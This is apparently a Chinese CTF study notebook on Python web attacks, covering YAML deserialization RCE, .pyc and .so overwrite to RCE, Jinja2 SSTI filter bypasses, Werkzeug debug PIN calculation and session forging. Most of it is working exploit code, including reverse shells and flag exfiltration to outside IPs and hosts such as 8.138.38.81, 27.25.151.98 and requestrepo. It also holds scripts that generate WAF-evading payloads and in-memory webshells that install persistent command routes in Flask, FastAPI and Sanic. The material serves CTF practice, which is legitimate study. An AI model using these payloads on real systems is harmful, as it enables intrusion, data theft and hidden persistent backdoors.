listitems: "__𝒾𝓂𝓅ℴ𝓇𝓉__('o''s').𝓈𝓎𝓈𝓉ℯ𝓂('whoami')"

!!python/object/new:type
args:
- exp
- !!python/tuple []
- {"extend": !!python/name:exec }
listitems: "__𝒾𝓂𝓅ℴ𝓇𝓉__('o''s').𝓈𝓎𝓈𝓉ℯ𝓂('bash -c \"bash -i >& /dev/tcp/8.138.38.81/1337 0>&1\"')"

- !!python/object/new:str
args: []
state: !!python/tuple
- "from urllib import request;print(getattr(request, 'urlopen')('http://27.25.151.98:8080/'+getattr(open('/flag'), 'read')()))"
- !!python/object/new:staticmethod
args: [0]
state:
update: !!python/name:exec

!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "\x5f\x5fimport\x5f\x5f('os')\x2esystem('curl -POST mil1\x2eml/jm9 -F x=@flag\x2etxt')"

但是本题有 waf,用上传文件绕吧。

img

1
!!python/module:uploads.exp 这里的 exp  恶意文件 /uploads/exp.py

不同版本解析差异

【Web】corCTF 2025 wp_2025 reverse wp-CSDN博客

The yaml document from hell

  1. 六十进制数字陷阱
1
2
3
port_mapping:
- 22:22
- 80:80
  • YAML 1.1解析[1342, "80:80"](22:22被当作60进制数)
  • YAML 1.2解析["22:22", "80:80"]
  1. 挪威问题(Boolean陷阱)
1
2
3
geoblock_regions:
- no
- se
  • 解析结果:[false, "se"]
  • 原因:nooffn在YAML 1.1中是false的别名
  1. 非字符串键
1
2
flush_cache:
on: [push, memory_pressure]
  • 解析结果:{"True": ["push", "memory_pressure"]}
  • 问题:on被解析为布尔值true作为键名
  1. 意外数字转换
1
2
3
versions:
- 10.23
- 12.13
  • 解析结果:[10.23, 12.13](变成数字而非字符串)
  • 可能导致模板逻辑错误:{% if version %}对数字0.0为假
  1. 锚点和别名问题
1
2
3
serve:
- *.html
- !.git
  • *.html中的*会被误认为是别名引用
  • !.git中的!是标签,可能导致代码执行(安全风险)

python脏数据污染

Python 脏任意文件写入到 RCE,通过写入共享对象文件或覆盖字节码文件 | siunam 的网站 — Python Dirty Arbitrary File Write to RCE via Writing Shared Object Files Or Overwriting Bytecode Files | siunam’s Website

当你的 Python 代码第一次导入一个模块时,比如 foo ,它会查找文件 foo.py 。如果找到 foo.py ,它会尝试查找编译后的字节码文件 __pycache__/foo.<magic>.pyc 。(其中 <magic> 是用于区分编译时 Python 版本的魔术标签)。如果找不到字节码文件,Python 将编译并写入字节码文件。以下是此解释的流程图:

image-20251205101749256

字节码pyc的构造:

image-20251205101909049

字节 0 到 3:魔数。正如我之前提到的,魔数是为了区分它所编译的 Python 版本。

字节 4 到 7:位域。这个字段通常没用,应该只包含 4 个空字节。

字节 8 到 11:修改日期。这个字段保存了导入模块文件的修改日期时间戳。假设代码正在导入模块 foo ,则编译后的字节码的修改日期字段将是 foo.py 文件的修改日期时间戳。

字节 12 到 15:文件大小。这个字段保存了导入模块文件的文件大小。

局限性:

  • 如果我们尝试覆盖一个字节码文件,被覆盖文件的魔数和修改时间戳必须是正确的( cpython/Python/import.c 第 994 - 1002 行)。否则,Python 会重新编译该字节码文件,从而实际上并没有覆盖该文件。此外,源文件大小也需要正确。

  • 导入的模块必须在不同的进程中稍后导入(以下三个例子)

    • import importlib.util
      
      def dynamicImportModule(moduleName, modulePath):
          spec = importlib.util.spec_from_file_location(moduleName, modulePath)
          importedModule = importlib.util.module_from_spec(spec)
          spec.loader.exec_module(importedModule)
          # do something with the imported module
      
      dynamicImportModule('utils', 'utils.py')
      
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10

      - ```python
      import concurrent.futures

      def dynamicImportModule(module):
      importedModule = __import__(module)
      # do something with the imported module

      with concurrent.futures.ProcessPoolExecutor() as executor:
      executor.submit(dynamicImportModule, 'utils')
    • 服务器重新启动以进行第二次导入。

存在任意文件读污染pyc

NuttyShell 文件管理器 - PUCTF 2025 Web 挑战赛题解 | siunam 的网站 — NuttyShell File Manager - PUCTF 2025 Web Challenge Writeup | siunam’s Website

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
import requests
import struct
import time
import marshal
from io import BytesIO

class Solver:
def __init__(self, baseUrl):
self.baseUrl = baseUrl
self.PDF_MAGIC_NUMBER = b'%PDF-'
self.BYTECODE_FILE_PATH = '/../__pycache__/utils.cpython-311.pyc'
self.FIELD_SIZE = 4 # https://nowave.it/python-bytecode-analysis-1.html
self.RCE_SOURCE_CODE = '__import__("os").system("sh -c /readflag > /app/uploads/flag.txt")'
self.BYTECODE_FILENAME = '/app/utils.py'
self.EXFILTRATED_FLAG_FILENAME = 'flag.txt'

def upload(self, filename, fileContent):
fileBytes = BytesIO(fileContent)
file = { 'file': (filename, fileBytes, 'application/pdf') }
requests.post(self.baseUrl, files=file)

def readFile(self, filename):
parameter = { 'filename': filename }
return requests.get(self.baseUrl, params=parameter).content

def modifyBytecode(self, bytecode):
# https://nowave.it/python-bytecode-analysis-1.html
# all headers MUST match to the original one, otherwise Python will re-compile it again
headers = bytecode[0:16]
magicNumber, bitField, modDate, sourceSize = [headers[i:i + self.FIELD_SIZE] for i in range(0, len(headers), self.FIELD_SIZE)]

modTime = time.asctime(time.localtime(struct.unpack("=L", modDate)[0]))
unpackedSourceSize = struct.unpack("=L", sourceSize)[0]

print(f'[*] Magic number: {magicNumber}')
print(f'[*] Bit field: {bitField}')
print(f'[*] Modification time: {modTime}')
print(f'[*] Source size: {unpackedSourceSize}')

codeObject = compile(self.RCE_SOURCE_CODE, self.BYTECODE_FILENAME, 'exec')
codeBytes = marshal.dumps(codeObject)

newBytecode = magicNumber + bitField + modDate + sourceSize + codeBytes + self.PDF_MAGIC_NUMBER
return newBytecode

def solve(self):
print('[*] Force compile utils.py bytecode file on the server...')
dummyFileContent = b'foo' + self.PDF_MAGIC_NUMBER
self.upload('test.txt', dummyFileContent)

print('[*] Reading the bytecode file content...')
bytecode = self.readFile(self.BYTECODE_FILE_PATH)
print(f'[+] Bytecode file content:\n{bytecode}')

print('[*] Modifying the bytecode with our own RCE payload...')
newBytecode = self.modifyBytecode(bytecode)
print(f'[+] RCE payload:\n{newBytecode}')

print('[*] Overwriting the original bytecode file with our own RCE payload...')
self.upload(self.BYTECODE_FILE_PATH, newBytecode)

print('[*] Executing the overwritten bytecode file...')
self.upload('test.txt', dummyFileContent)

# the RCE payload executes binary `/readflag` and outputs the flag to `/app/uploads/flag.txt`.
# now we can read the flag
flag = self.readFile(self.EXFILTRATED_FLAG_FILENAME).decode()
print(f'[+] Flag: {flag}')

if __name__ == '__main__':
# baseUrl = 'http://localhost:5000/' # for local testing
baseUrl = 'http://chal.polyuctf.com:41337/'
solver = Solver(baseUrl)

solver.solve()

不存在任意文件读污染so

你可以直接上传一个共享对象( .so )文件,如果应用程序在 Windows 上运行,则上传 .pyd 文件,或者在 iOS 上上传 .fwork 文件。

根据 PEP 420 – 隐式命名空间包部分“规范”,在导入处理期间,导入机制将继续迭代父路径中的每个目录,就像在 Python 3.2 中一样。 在查找名为“foo”的模块或包时,对于父路径中的每个目录:

如果找到 <directory>/foo/__init__.py ,则导入并返回一个常规包。

否则,如果找到了 <directory>/foo.{py,pyc,so,pyd} ,则导入并返回一个模块。

并且,文件 .so 将优先于扩展名 .py.pyc ,这是因为 .soextension_loaders 列表中的第一个项目。

1
2
__import__('os').system('wget --post-data "$(id)" -O- 48jcuj6n.requestrepo.com')
__import__('os').popen('cat /flag')
1
2
pip install cpython
cythonize -i test.py

Flask

SSTI

image-20251104104705006

以 Bypass 为中心谭谈 Flask-jinja2 SSTI 的利用-先知社区

预备知识

  1. __class__ 可以获得当前变量的类。
  2. __base__ 可以获得当前类的父类。
  3. __mro__ 可以获得当前类的解析方法顺序(类的顺序)。
  4. __subclasses() 可以获得当前类的所有子类,返回类。
  5. __init__.__globals__ 查看当前类所以初始化后可以调用的变量方法名及参数,返回字典。
  6. ["function_name"]("arrg") 调用方法传参。
  7. .read() 通过类似指针获取执行后的结果。
  8. dict(xx=yy,zz=xx) | join 创建一个字典,并拼接键名,也就是说 xxzz

对象的属性和字典的键

  1. . 会先查找该对象的属性,如果没有,会查找对应字典的键值。
  2. xx | attr() 类似就是用来查 xx 下的属性。
  3. [""].get("") 用来获取字典的键值。

绕过

  1. [xxx] 可以用 __getitem__(xx) 绕过

  2. 单引号过滤可以通过 flask 自带的requestrequest.args/cookies/values/headers.xx 参数传值进去。

  3. {{config.__class__.__init__.__globals__["os"].popen("ls").read()}}

  4. {{lipsum.__globals__.os.popen("ls").read()}}

  5. Get an attribute of an object. lipsum|attr("bar") works like lipsum.__globals__

  6. {{}}{% %},前者可以用来标记变量,后者用来标记语句,所以常常可以 {{}} = {%print()%}

  7. '\u005f\u005f\u0062\u0075\u0069\u006c\u0074\u0069\u006e\u0073\u005f\u005f']['\u0065\u0076\u0061\u006c' Unicode绕。

    基于flask常见trick——unicode&进制编码绕过-先知社区

  8. '\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f']['\x65\x76\x61\x6c' hex绕。

  9. 数字半角转全角。

  10. 获取符号的方法:用内置的函数和对象获取符号

    lipsum|string|list 然后转化为 list 之后就可以指定下标随意获取。

    1
    2
    {% set po=dict(po=a,p=a)|join%}
    {% set a=(()|select|string|list)|attr(po)(24)%}
  11. 当存在 _frozen_importlib.BuiltinImporter 时,调用["load_module"]("os")["popen"]("ls /").read()}}

  12. 当存在 subprocess.Popen 时候,调用 ('ls /',shell=True,stdout=-1).communicate()[0].strip()}}

  13. 斜体绕过:

1
2
3
𝒶𝒷𝒸𝒹ℯ𝒻ℊ𝒽𝒾𝒿𝓀𝓁𝓂𝓃ℴ𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏𝒜ℬ𝒞𝒟ℰℱ𝒢ℋℐ𝒥𝒦ℒℳ𝒩𝒪𝒫𝒬ℛ𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵
𝘢𝘣𝘤𝘥𝘦𝘧𝘨𝘩𝘪𝘫𝘬𝘭𝘮𝘯𝘰𝘱𝘲𝘳𝘴𝘵𝘶𝘷𝘸𝘹𝘺𝘻𝘈𝘉𝘊𝘋𝘌𝘍𝘎𝘏𝘐𝘑𝘒𝘓𝘔𝘕𝘖𝘗𝘘𝘙𝘚𝘛𝘜𝘝𝘞𝘟𝘠𝘡
__𝒾𝓂𝓅ℴ𝓇𝓉__('os').𝓈𝓎𝓈𝓉ℯ𝓂('calc')
  1. 1
    {{x.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat /f*').read()")}}

Flask debug PIN

PIN码是Flask在开启debug模式下,进行代码调试模式的进入密码,需要正确的PIN码才能进入调试模式。

计算逻辑位于 python3.x/site-packages/werkzeug/debug/__init__.py#get_pin_and_cookie_name,版本不同的区别在于3.6与3.8的md5加密和sha1加密不同。

PIN生成要素

  1. username

    用户名。通过 getpass.getuser() 读取,通过文件读取 /etc/passwd

  2. modname

    模块名。通过 getattr(mod,"file",None) 读取,默认值为 flask.app

  3. appname

    应用名。通过 getattr(app,"name",type(app).name) 读取,默认值为 Flask

  4. moddir

    Flask库下 app.py 的绝对路径。通过 getattr(mod,"file",None) 读取,实际应用中通过报错读取。

  5. uuidnode

    当前网络的mac地址的十进制数。通过 uuid.getnode() 读取,通过文件 /sys/class/net/eth0/address 得到16进制结果,转化为10进制进行计算。

  6. machine_id

    docker机器id。每一个机器都会有自已唯一的id,linux的id一般存放在 /etc/machine-id/proc/sys/kernel/random/boot_id,docker靶机则读取 /proc/self/cgroup/proc/self/mountinfo/proc/self/cpuset,其中第一行的 /docker/ 字符串后面的内容作为机器的id,在docker环境下读取后两个,非docker环境三个都需要读取。

    首先访问/etc/machine-id,有值就break,没值就访问/proc/sys/kernel/random/boot_id,然后不管此时有没有值,再访问/proc/self/cgroup/proc/self/mountinfo/proc/self/cpuset 其中的值拼接到前面的值后面。

PIN生成脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
# <3.8 MD5
import hashlib
import time
from itertools import chain
probably_public_bits = [
'flaskweb'# username, /etc/passwd
'flask.app',# modname, 默认值
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__')), 默认值
'/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None), baox
]

private_bits = [
str(int('02:42:ac:1e:00:02'.replace(':',''),16)),# str(uuid.getnode()), /sys/class/net/eth0/address, /sys/class/net/ens33/address
'0402a7ff83cc48b41b227763d03b386cb5040585c82f3b99aa3ad120ae69ebaa'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num

def hash_pin(pin: str) -> str:
return hashlib.sha1(f"{pin} added salt".encode("utf-8", "replace")).hexdigest()[:12]

print(rv)
print(cookie_name + "=" + f"{int(time.time())}|{hash_pin(rv)}")
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
# >=3.8 sha1
import hashlib
import time
from itertools import chain
probably_public_bits = [
'root'# /etc/passwd 第一个或最后一个
'flask.app',# 默认值
'Flask',# 默认值
'/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]

private_bits = [
str(int('02:42:ac:1e:00:02'.replace(':',''),16)),# str(uuid.getnode()), /sys/class/net/eth0/address, /sys/class/net/ens33/address 16进制转10进制
#machine_id:1.先读/etc/machine-id 2.没有1就读/proc/sys/kernel/random/boot_id 3.再加上/proc/self/cgroup(取第一行的最后一个斜杠/后面的所有字符串)
'5dcbb59326564e8ea4e99a0afb803c47'+ # /etc/machine-id
'5dcbb593-2656-4e8e-a4e9-9a0afb803c47'+ # /proc/sys/kernel/random/boot_id
'0::/'.strip().rpartition("/")[2] # /proc/self/cgroup OR /proc/self/mountinfo OR /proc/self/cpuset
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num

def hash_pin(pin: str) -> str:
return hashlib.sha1(f"{pin} added salt".encode("utf-8", "replace")).hexdigest()[:12]

print(rv)
print(cookie_name + "=" + f"{int(time.time())}|{hash_pin(rv)}")

URL

  • frm如果没有报错信息的话值为0
  • s的值可以直接访问./console,然后查看源码的SECRET值
1
2
3
http://x.x.x.x/console?&__debugger__=yes&cmd=__import__("os").popen("id").read()&frm=0&s=[s_value]

Cookie: [Cookie]

fenjing

webui

运行方法:

1
2
pip install fenjing
fenjing webui

image-20250907123918898

盲扫大概长这样,用法如图。

image-20250907123955858

为WAF定制脚本

Shell
静态 WAF
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from fenjing import exec_cmd_payload, config_payload
import logging

logging.basicConfig(level=logging.INFO)


def waf(s: str):
blacklist = [
# "config", "self", "g", "os", "class", "length", "mro", "base", "lipsum",
# "[", '"', "'", "_", ".", "+", "~", "{{",
"0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "cat", "__globals__","'",'"'
# "0","1","2","3","4","5","6","7","8","9"
]
return all(word not in s for word in blacklist)


if __name__ == "__main__":
shell_payload, _ = exec_cmd_payload(waf, "ls /")
# config_payload = config_payload(waf)

print(f"{shell_payload=}")
# print(f"{config_payload=}")

测试 Flask 环境:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
"""一个可以被SSTI的服务器
"""

from flask import Flask, request, render_template_string

app = Flask(__name__)

blacklist = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "cat", "__globals__","'",'"']


@app.route("/", methods=["GET", "POST"])
def index():
name = request.args.get("name", "world")
if any(w in name for w in blacklist):
return "NO!"
template = f"""
Hello, {name}
<form action="/" method="GET">
<input type="text" name="name" id="">
<input type="submit" value="">
</form>
"""

return render_template_string(template)


if __name__ == "__main__":
app.run(host="0.0.0.0", port=5000,debug=True)
动态 WAF
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import functools
import time
import requests
from fenjing import exec_cmd_payload


URL = "http://10.137.0.28:5000"


@functools.lru_cache(1000)
def waf(payload: str): # 如果字符串s可以通过waf则返回True, 否则返回False
time.sleep(0.02) # 防止请求发送过多
resp = requests.get(URL, timeout=10, params={"name": payload})
return "BAD" not in resp.text


if __name__ == "__main__":
shell_payload, will_print = exec_cmd_payload(
waf, 'bash -c "bash -i >& /dev/tcp/example.com/3456 0>&1"'
)
if not will_print:
print("这个payload不会产生回显!")

print(f"{shell_payload=}")
内存马
静态 WAF
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
import fenjing
import requests

# 这个内存马会获取GET参数cmd并执行,然后在header Aaa中返回
payload = """
[
app.view_functions
for app in [ __import__('sys').modules["__main__"].app ]
for c4tchm3 in [
lambda resp: [
resp
for cmd_result in [__import__('os').popen(__import__('__main__').app.jinja_env.globals["request"].args.get("cmd", "id")).read()]
if [
resp.headers.__setitem__("Aaa", __import__("base64").b64encode(cmd_result.encode()).decode()),
print(resp.headers["Aaa"])
]
][0]
]
if [
app.__dict__.update({'_got_first_request':False}),
app.after_request_funcs.setdefault(None, []).append(c4tchm3)
]
]
"""

def waf(s):
return "/" not in s


full_payload_gen = fenjing.FullPayloadGen(waf)
payload, will_print = full_payload_gen.generate(fenjing.const.EVAL, (fenjing.const.STRING, payload))
if not will_print:
print("这个payload不会产生回显")
print(payload)

# 生成payload后在这里打上去
r = requests.get("http://127.0.0.1:5000/", params = {
"name": payload
})

print(r.text)
# 然后使用`?cmd=whoami`就可以在header里看到命令执行结果了
动态 WAF
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
import functools
import time
import requests
import fenjing

# 这个内存马会获取GET参数cmd并执行,然后在header Aaa中返回

payload = """[ __import__(\'time\').sleep(3) for flask in [__import__("flask")] for app in __import__("gc").get_objects() if type(app) == flask.Flask for jinja_globals in [app.jinja_env.globals] for zzz in [ lambda : __import__(\'os\').popen(jinja_globals["request"].args.get("cmd", "id")).read() ] if [ app.__dict__.update({\'_got_first_request\':False}), app.add_url_rule("/zzz", endpoint="zzz", view_func=zzz) ] ]"""

# payload ="""{{"".__class__.__base__.__subclasses__()[''].__init__.__globals__['__builtins__']['eval']("__import__('sys').modules['__main__'].__dict__['app'].before_request_funcs.setdefault(None,[]).append(lambda :__import__('os').popen('whoami').read())")}}"""

URL = "http://019a6149-9bcf-7149-9eeb-c5af5fc68f48.geek.ctfplus.cn/"



@functools.lru_cache(10000)
def waf(payload): # 如果字符串s可以通过waf则返回True, 否则返回False
time.sleep(0.02) # 防止请求发送过多
resp = requests.get(URL, timeout=10, params={"name": payload})
s = resp.text
print(s)
if "是不会给你渲染的" not in s and "渲染出错" not in s:
return 1
else:
return 0


full_payload_gen = fenjing.FullPayloadGen(waf)
payload, will_print = full_payload_gen.generate(fenjing.const.EVAL, (fenjing.const.STRING, payload))
if not will_print:
print("这个payload不会产生回显")
print(payload)

# 生成payload后在这里打上去
r = requests.get(URL, params = {
"name": payload
})

print(r.text)

flask-session

伪造

flask_session_cookie_manager3.py

1
2
python flask_session_cookie_manager3.py decode -c "eyJyb2xlIjoidXNlciIsInVzZXJuYW1lIjoiWjNyNHkifQ.aMkpjg.6IhjoNDIM7h_F6MD3QDu7Wr9sPU" -s "KEY"
python flask_session_cookie_manager3.py encode -s "KEY" -t "{'role': 'admin', 'username': 'zz'}"

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import requests
import re

url = 'http://url:10001'
bypass = '../../../../../../../../../..'

rw = []

map_list = requests.get(f"{url}/read?filename={bypass}/proc/self/maps")
map_list = map_list.text.split("\n")
for i in map_list:
map_addr = re.match(r"([a-z0-9]+)-([a-z0-9]+) rw", i)
if map_addr:
start = int(map_addr.group(1), 16)
end = int(map_addr.group(2), 16)
print("Found rw addr:", start, "-", end)
rw.append((start,end))

for k in rw:
res = requests.get(f"{url}/read?filename={bypass}/proc/self/mem&start={k[0]}&end={k[1]}")
if "SECRET" in res.text:
try:
secret_key = re.findall("[A-Za-z0-9+/=]{40}SECRET", res.text)
if secret_key:
print(secret_key[0])
except:
pass

Zlib压缩

客户端 session 导致的安全问题 | 离别歌

la ctf 2025 题解 — la ctf 2025 writeups

flask生成过程:

  1. json.dumps 将对象转换成json字符串,作为数据
  2. 如果数据压缩后长度更短,则用zlib库进行压缩
  3. 将数据用base64编码
  4. 通过hmac算法计算数据的签名,将签名附在数据后,用“.”分割

Zlib 压缩在数据熵较低时效果最佳,这里的低熵意味着重复的序列。如果同一个字符串在数据中出现多次,则更容易压缩数据。如果你把 flag 作为你的用户名,flag 就会在输入数据中出现两次,这样就很容易被压缩。我通过填充用户名来避免 JSON 中 ":" 的重复,然后猜测 flag 的子字符串,从而能够一次泄露 flag 的一个字符。当从服务器获取的 session 第一部分base64解码后较短时,意味着使用了压缩(因此字符串匹配)。

读全局变量

1
{config.__init__.__globals__[FLAG]}

CTFshow

web361

payload:{{"".__class__.__base__.__subclasses__()[132].__init__.__globals__["popen"]("cat /flag").read()}}

web362

禁用了数字。

lipsum.__globals__ 中有 <module 'os' from '/usr/local/lib/python3.8/os.py'>

os 模块导入进去,直接调用 popen 即可。

payload:{{lipsum.__globals__.get('os').popen('cat /flag').read()}}

web363

payload:{{().__class__.__base__.__subclasses__()[132].__init__.__globals__[request.args.AA](request.args.BB).read()}}&AA=popen&BB=cat</flag

或者你可以把数据存到其他的地方,都可以。

web364

payload:{{().__class__.__base__.__subclasses__()[132].__init__.__globals__[request.values.AA](request.values.BB).read()}}&AA=popen&BB=cat</flag

或者你可以把数据存到其他的地方,都可以。

web365

过滤了 []

payload:?name={{().__class__.__base__.__subclasses__().__getitem__(132).__init__.__globals__.__getitem__(request.headers.ServerS)(request.headers.Server).read()}}

web366

payload:{{(lipsum|attr(request.headers.SS)).os.popen(request.headers.Server).read()}}

web367

payload:?name={{(lipsum|attr(request.headers.SS)).get(request.headers.A).popen(request.headers.Server).read()}}

web368

payload:{%print((lipsum|attr(request.headers.SS)).get(request.headers.A).popen(request.headers.Server).read())%}

web369-372

过滤了 [,],",',request,print,数字 一系列。

  1. 构造一些特殊字符,还有关键字。

  2. 再构造出 char 函数:

1
2
set chrr = __init__.__globals__.__builtins__.chr
其中:对于函数都采用 x | attr(关键字) 的形式处理
  1. 对于数字,可以用全角数字绕过。
  2. 对于最后的命令,可以用 ASCII 表建立一个类似于 curl url -F xx=@/flag -X POST 的 POST 请求,带出 flag。
  3. 最后由于过滤,使用 if 语句绕过 waf。
1
2
3
{% if Code%}
XXX
{% endif %}

沙箱逃逸

Typhon: 一种pyjail自动化绕过的思路及其粗略实现

当前版本不支持 audithook 沙箱。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
WELCOME = '''
_ ______ _ _ _ _
| | | ____| (_) | | (_) |
| |__ | |__ __ _ _ _ __ _ __ ___ _ __ | | __ _ _| |
| '_ \| __| / _` | | '_ \| '_ \ / _ \ '__| _ | |/ _` | | |·
| |_) | |___| (_| | | | | | | | | __/ | | |__| | (_| | | |
|_.__/|______\__, |_|_| |_|_| |_|\___|_| \____/ \__,_|_|_|
__/ |
|___/
'''

print(WELCOME)

print("Welcome to the python jail")
print("Let's have an beginner jail of calc")
print("Enter your expression and I will evaluate it for you.")
if __name__ == '__main__':
import Typhon
Typhon.bypassRCE(cmd='calc',
banned_chr=['__loader__','__import__','os','[:','\\x','+','join', '"', "'",'1','2','3','4','5','6','7','8','9','0b','subprocess'],
local_scope={'__builtins__':None, 'lit':list, 'dic':dict},)

内存马

Flask

内存马:区别于 落地码 不写入文件,仅对当前运行的东西写入一些暂时性的配置东西。

before_request

SSTI 中,可以用来通过操作该函数,每次请求收到第一时间执行命令。

{{"".__class__.__base__.__subclasses__()[''])}} 这个payload 单独运行会报错,但是组合起来,会发现它在 flask 环境中是一个 undifined 的对象,从而存在魔术方法等,我们暂且称这一段为 undifined。

undifined.__init__.__globals__['__builtins__']['eval']("__import__('sys').modules['__main__'].__dict__['app'].before_request_funcs.setdefault(None,[]).append(_Function)

这里用了 builtins 下面的 evalapp.beforerequest 进行操作,如果不知道命令是如何被底层调用的话可以点进去看一下,如图。

image-20250907124627684

就是在这里传了一个函数 f

那么我们也可以模仿这样,传入 f 函数,这里用匿名函数。形如:

lambda :__import__('os').popen('whoami').read()

就像 js 中伪代码一样。

我们试一下效果:

先打入内存马。

image-20250907124803874

再刷新可以发现内存马在每次 request 前被执行了,并且被 return 了,所以再传啥都会返回这个了。

image-20250907124822159

payload:{{"".__class__.__base__.__subclasses__()[''].__init__.__globals__['__builtins__']['eval']("__import__('sys').modules['__main__'].__dict__['app'].before_request_funcs.setdefault(None,[]).append(lambda :__import__('os').popen('whoami').read())")}}

errorhandler

这个函数正常调用是长这样的:

1
2
@app.errorhandler(404)
def page_not_found(e):

那么同样我们跟进去,根据博客知道在第一层函数有一个 check,我们无法从第一层直接操作该程序,我们在 return 的地方再跟一步,发现了下面的东西

1
2
exc_class, code = self._get_exc_class_and_code(code_or_exception)
self.error_handler_spec[None][code][exc_class] = f

这个是在跟刚才一样了。我们可以:

1
2
exc_class, code = self._get_exc_class_and_code(404)
self.error_handler_spec[None][code][exc_class] = _Fuction(匿名函数)

这样不也形成了刚才一样的效果了吗?

那么我们用 exec 执行以下,就可以得到刚才同样的效果了。

1
{{"".__class__.__base__.__subclasses__()[''].__init__.__globals__['__builtins__']['exec']("global exc_class;global code;global app;app=__import__('sys').modules['__main__'].__dict__['app'];exc_class, code = app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda a:__import__('os').popen('ls').read()")}}

打入内存马:

image-20250907131403298

看一下效果。

image-20250907131342992

创建路由

1
{{lipsum.__globals__.__builtins__.eval('[ __import__(\'time\').sleep(3) for flask in [__import__("flask")] for app in __import__("gc").get_objects() if type(app) == flask.Flask for jinja_globals in [app.jinja_env.globals] for zzz in [ lambda : __import__(\'os\').popen(jinja_globals["request"].args.get("cmd", "id")).read() ] if [ app.__dict__.update({\'_got_first_request\':False}), app.add_url_rule("/zzz", endpoint="zzz", view_func=zzz) ] ]')}}

/zzz?cmd=whoami

FastAPI

加路由

1
/calc?calc_req=config.__init__.__globals__['__builtins__']['exec']('app.add_api_route("/flag",lambda:__import__("os").popen("cat /flag").read());',{"app":app})

挂载静态文件

1
/calc?calc_req=lipsum.__globals__['__builtins__'].exec("from fastapi.staticfiles import StaticFiles;app.mount('/static', StaticFiles(directory='/'), name='static')", {"app": app})

Sanic

1
eval('app.add_route(lambda request: __import__("os").popen(request.args.get("zzz")).read(),"/zzz", methods=["GET", "POST"])')